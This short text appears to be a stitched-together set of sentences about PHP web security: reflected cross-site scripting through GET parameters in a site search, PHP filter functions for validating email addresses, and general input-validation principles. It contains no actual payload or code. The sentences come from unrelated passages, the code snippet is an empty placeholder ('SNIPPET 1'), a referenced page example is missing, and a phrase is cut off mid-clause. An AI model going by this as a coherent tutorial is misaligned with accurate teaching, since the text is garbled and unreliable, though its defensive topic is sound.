If we have some code, for example a search engine in our website which responds to get parameters and has the following snippet: SNIPPET 1 A legitimate user might get a page resembling something like this: However, any user is going to be able to add tags to the queries and at the very least change drastically the way your page is formatted.
For example, he can target particular browsers and send links with malicious GET parameters which would load external Java Script files.
Fortunately, PHP (5 and later) comes with a handy set of functions and filters that make testing for email address validity a snap.
Getting email addresses you collect — for a newsletter, say, or for password retrieval — to at least conform to standards (if not ensure ) is crucial, of course, and extremely tricky.
Its usage isn't very programmer-friendly, but the way it wraps all of the customary data filtering and sanitizing methods into one interface makes it worth knowing.
The focus in this chapter is therefore how to make your applications more secure.
This chapter will begin by rehashing the fundamentals of secure PHP programming.
Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the external party.
Data from all potentially untrusted sources should be subject to input validation, including not only Internet-facing web clients but also backend feeds over extranets, from suppliers, partners, vendors or regulators, each of which may be compromised on their own and start sending malformed data.